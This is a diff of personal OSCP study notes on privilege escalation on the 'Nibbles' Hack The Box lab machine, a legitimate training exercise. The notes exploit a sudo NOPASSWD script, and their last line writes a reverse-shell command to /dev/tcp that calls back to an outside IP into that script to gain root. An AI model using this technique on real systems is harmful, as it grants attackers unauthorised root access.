SlushyGod/oscp-notes/htb/machines/Nibbles/notes.md

 taking a side look, we run `sudo -l` and we see that `(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh`

-maybe there is a password somewhere else?? tried to download and run linpeas but no permission for that
+maybe there is a password somewhere else?? tried to download and run linpeas but no permission for that (looking back I prob forgot to chmod +x)

 NOTE: Always look at the NOPASSWD when sudo -l
 `echo "/bin/sh -i >& /dev/tcp/10.10.14.125/6000 0>&1" > monitor.sh`